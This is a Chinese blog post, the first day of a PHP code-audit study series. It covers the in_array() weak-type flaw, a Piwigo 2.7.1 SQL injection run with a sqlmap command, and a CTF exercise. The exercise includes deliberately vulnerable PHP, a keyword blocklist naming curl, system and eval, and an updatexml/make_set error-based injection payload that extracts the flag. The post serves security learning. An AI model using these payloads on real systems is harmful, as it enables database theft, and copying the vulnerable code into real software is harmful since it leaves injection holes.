PHP代码审计——第一天

最新推荐文章于 2024-05-18 11:04:16 发布
最新推荐文章于 2024-05-18 11:04:16 发布
阅读量897 收藏
点赞数
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31812157/article/details/125870670
版权

①in_array函数缺陷

代码实例:

 这是文件上传检测的代码,问题出在12行,由于in_array没有设置第三个参数,导致攻击者可以构造参数名才绕过,例如5shell.php,都可以绕过,只要是在1-24中的数字(因为whitelist是1-24),因为whitelist是数字型,所以shell.php会自动去掉只剩5,发生强制类型转换

看看PHP手册对 in_array() 函数的定义。

in_array :(PHP 4, PHP 5, PHP 7)

功能 :检查数组中是否存在某个值

定义bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] )

$haystack 中搜索 $needle ,如果第三个参数 $strict 的值为 TRUE ,则 in_array() 函数会进行强检查,检查 $needle 的类型是否和 $haystack 中的相同。如果找到 $haystack ,则返回 TRUE,否则返回 FALSE

实例分析:

piwigo-2.7.1代码审计

安装版本mysql<=5.6 否则测试时候各种报错

picture.php文件传参action 使用switch函数进行判断

 picture.php文件调用了include/functions_rate.inc.php,并且进行rate传参

跟入进去发现有in_array函数   

 $conf['rate_items']  存在于 config_default.inc.php

 利用弱类型比较,即可过掉验证

往下寻找发现这段代码传参传入了$rate ,于是可以用sql时间盲注

 利用sqlmap进行注入

sqlmap.py -u "http://127.0.0.1/1/picture.php?/1/&action=rate" --data "rate=1" --dbs --batch

题目练习

//index.php
<?php
include 'config.php';
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("连接失败: ");
}

$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $whitelist = range(1, $row['COUNT(*)']);
}

$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";

if (!in_array($id, $whitelist)) {
    die("id $id is not in whitelist.");
}

$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    echo "<center><table border='1'>";
    foreach ($row as $key => $value) {
        echo "<tr><td><center>$key</center></td><br>";
        echo "<td><center>$value</center></td></tr><br>";
    }
    echo "</table></center>";
}
else{
    die($conn->error);
}

?>
//config.php
<?php  
$servername = "localhost";
$username = "fire";
$password = "fire";
$dbname = "day1";

function stop_hack($value){
	$pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
	$back_list = explode("|",$pattern);
	foreach($back_list as $hack){
		if(preg_match("/$hack/i", $value))
			die("$hack detected!");
	}
	return $value;
}
?>
# 搭建CTF环境使用的sql语句
create database day1;
use day1;
create table users (
id int(6) unsigned auto_increment primary key,
name varchar(20) not null,
email varchar(30) not null,
salary int(8) unsigned not null );

INSERT INTO users VALUES(1,'Lucia','Lucia@hongri.com',3000);
INSERT INTO users VALUES(2,'Danny','Danny@hongri.com',4500);
INSERT INTO users VALUES(3,'Alina','Alina@hongri.com',2700);
INSERT INTO users VALUES(4,'Jameson','Jameson@hongri.com',10000);
INSERT INTO users VALUES(5,'Allie','Allie@hongri.com',6000);

create table flag(flag varchar(30) not null);
INSERT INTO flag VALUES('HRCTF{1n0rrY_i3_Vu1n3rab13}');

将id传入witelist查询,但是in_array没有第三个参数因此可以进行报错注入,否则不会成功

传入id之前先回进行stop_hack检测,我们跟进看看,发现concat已经被拦截了,于是用make_set函数照样可以 

http://127.0.0.1/index.php?id=1 and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))

K0e1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码审计资料整理——新手学习
10-13
适用于新手学习代码审计
三天学会PHP——第一天
08-28
三天学会PHP教程——这是第一天的内容,对初学者还不错,入手简单。
PHP代码审计文档.zip
11-02
目录:网盘文件永久链接 第27课:漏洞实战之越权漏洞mp4 第26课:漏润实战之任意文件删除漏洞mp4 第25课:漏洞实战之任意文件写入漏洞mp4 第24课:漏洞实战之CSRF漏洞mp4 第23课:漏洞实战之代码执行漏洞mp4 第22课:漏洞实战之存储型 XSS. mp4 第21课:漏洞实战之系统SQL注入漏洞mp4 第20课:漏洞实战之系统重装漏洞mp4 第19课:PHP代码审计之会话认证漏洞mp4 第18课:PHP伪协议mp4 第17课:PHP弱类型mp4 第16课:PHP代码审计之反序列化漏润mp4 第15课:PHP代码审计之变量盖漏洞mp4 第14课PHP代码审计之任意文件读取及删除漏洞mp4 第13课:PHP代码审计之目录穿越及文件包含漏洞mp4 第12课:PHP代码审计之文件上传漏洞mp4 第11课:代码审计之CSRF漏洞mp4 第10课:代码审计之XSS漏洞mp4 第9课:代码审计之命令执行漏洞mp4 第8课:代码审计之代码执行漏洞mp4 第7课:PHP代码审计宽字节注入及二次注入mp4 第6课:PHP代码审计SQL注入漏洞mp4 第5课:审计涉及的超全局变量mp4 第4课:代码调试及 Xdebug的配置使用mp4 第3课:PHP核心配置详解mp4 第2课:代码审计的思路及流程mp4 第1课:环境配置及审计工具介绍mp4
PHP代码审计13—弱类型
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-11 498
PHP 代码审计之弱类型,CTF例题与实例分析
php foreach 过滤条件_php代码审计学习之函数缺陷
weixin_32645173的博客
01-19 2083
原文地址:php代码审计之函数缺陷​syst1m.comin_array函数缺陷Wish ListCodeclass Challenge { const UPLOAD_DIRECTORY = './solutions/'; private $file; private $whitelist; public function __construct($file) { $th...
Piwigo 2.7.1 SQLI学习
ma_de_hao_mei_le的博客
06-23 251
https://144.one/piwigo-271-sqlixue-xi.html
[PHP代码审计]Piwigo11.4.0存在SQL注入漏洞
Y4tacker的博客
06-03 986
文章目录Piwigo11.4.0存在SQL注入漏洞写在前面分析 Piwigo11.4.0存在SQL注入漏洞 写在前面 国内的不够玩了,玩玩国外的,不过刚找到一个最后告诉我,被交了,好吧为了高大一点教大家一个收集自己装备库的方法 分析 我们查看提交记录,点我直达,发现有一个fix是关于sql注入的 那么我们安装好以后去看一眼,首先是首行的两个参数过滤 觉得很好玩给大家看一眼 限制为数字,好了不多吹牛逼了,看下面正题 首先是接收order参数保证二维数组的[0][column]有值并赋值给变量$col,
PHP代码审计练习三
黑面狐
04-25 358
这次审计的是星空个人博客系统XKLog(PHP) 0.7.2441.安装文件第二步博客名称和个人签名存在xss 直接获取参数信息没有进行任何过滤 2、XFF处sql注入 报错型记录获取的IP是直接通过http header 的xff中获取 登录时会记录IP地址然后存储 所以没有任何过滤 所以报错了 3、XFF处的XSS漏洞 在线列表中也是会调用XFF的IP地址同样没有过滤可以导致XSS 访问在线列...
PHP代码审计练习一
黑面狐
04-19 2137
定个小目标,每天审计一套源码。大的站点搞不定就找些小的来练习。这次练习的是一个留言版本的小功能。1.验证码可以从cookie中获取。代码中留言板提交的验证码直接跟cookie中的regimcode中进行比较。那么我们直接提交的时候抓包所以直接可以从cookie中获取验证码,那么这个验证码就对我们无效了所以灌水发帖的时候,我们只需要固定好cookie中的验证码和我们提交的一样就可以了2、登录绕过问题...
2018最新代码审计教程笔记-代码审计入门
DYBOY-程序开发&网络安全
12-29 7088
由于之前的学习不是非常的系统,故此重新整理学习“代码审计”,博客也更新相关内容。   0x01:调试函数 echo (print): 这是最简单的输出数据调试方法,一般用来输出变量值,或者你不确定程序执行 到了哪个分支的情况下是用。 print_r、var_dump(var_export)、debug_zval_dump 这个主要是用来输出变量数据值,特别是数组和对象数据,一般我们在查看
seay代码审计工具_代码审计入门实战
weixin_39544333的博客
11-29 369
原创 月亮警察针灸你 合天智汇前段时间在整理一个PHP函数代码审计的项目,所以文章也是围绕PHP代码审计来写,如果有写的不对的地方,还请大佬们指正。文章开始前,我们先来了解一下PHP是什么。0x01 PHP是什么根据百度百科的描述,PHP是一种在服务器端执行的通用开源脚本语言,主要适用于Web开发。既然是网站编程语言,自然需要一款工具辅助程序员高效编程。PhpStorm就是一款PHP集成开发工具...
代码审计学习01-in_array() 函数缺陷
anbangsi3839的博客
10-23 331
一、开始代码审计之旅 01 从今天起,学习代码审计了,这篇文章就叫代码审计01吧,题目来自 PHP SECURITY CALENDAR 2017 的第一题,结合 红日安全 写的文章,开始吧。 二、先看这道题目 1、题目名称:Wish List 2、in_array() 函数的作用 in_array() 函数的作用是判断第一参数是否存在第二个参数中,存在返回 true,不存在返回 fa...
如何同步管理1000个设备的VLAN数据?
weixin_68261415的博客
05-15 735
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
关于 struct sockaddr_in
weixin_73964834的博客
05-16 658
这个struct sockaddr_in 前三行有三个变量。
如何构建基因单倍型网络
最新发布
hgz2020的博客
05-18 582
单倍型分析
FebHost:为什么企业需要注册保加利亚.BG域名?
05-16 376
品牌本土化战略的实施同样离不开.BG域名的助力。拥有.BG域名的企业可以显著提高其在来自保加利亚的搜索请求中的可见度和排名,吸引更多的目标访问者,提升用户参与度。在当今全球化的商业环境中,对于与保加利亚市场息息相关的企业而言,选择合适的域名至关重要。面对日益饱和的通用顶级域名市场,.BG提供了一个具有区域特色的替代选择,帮助企业在保加利亚市场中树立一个鲜明且难忘的网络形象。综上所述,对于志在保加利亚市场塑造坚实网络地位的企业、组织或个人而言,.BG域名是一个明智且具有战略意义的选择,值得业界关注和利用。
等保测评实体分享three
ddcajdkdl的博客
05-16 926
它除了检测自身的主机以外,根本不检测网络上的情况,而且对入侵行为分析的工作量将随着主机数量的增加而增加,因此全面部署主机入侵检测系统代价比较大,企业很难将所有主机用主机入侵检测系统保护,只能选择部分主机进行保护,那些未安装主机入侵检测系统的机器将成为保护的盲点,入侵者可利用这些机器达到攻击的目标。NIDS一般部署在比较重要的网段内,它不需要改变服务器等主机的配置,由于它不会在业务系统的主机中安装额外的软件,从而不会影响这些机器的CPU、I/O与磁盘等资源的使用,不会影响业务系统的性能。
php 下个月第一天
05-31
获取PHP中下个月的第一天...上述代码中,`strtotime('+1 month')`可以获取当前时间加上一个月后的时间戳,然后使用`date()`函数将时间戳转换为日期格式,其中`'Y-m-01'`表示获取年月以及月的第一天,即下个月的第一天

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值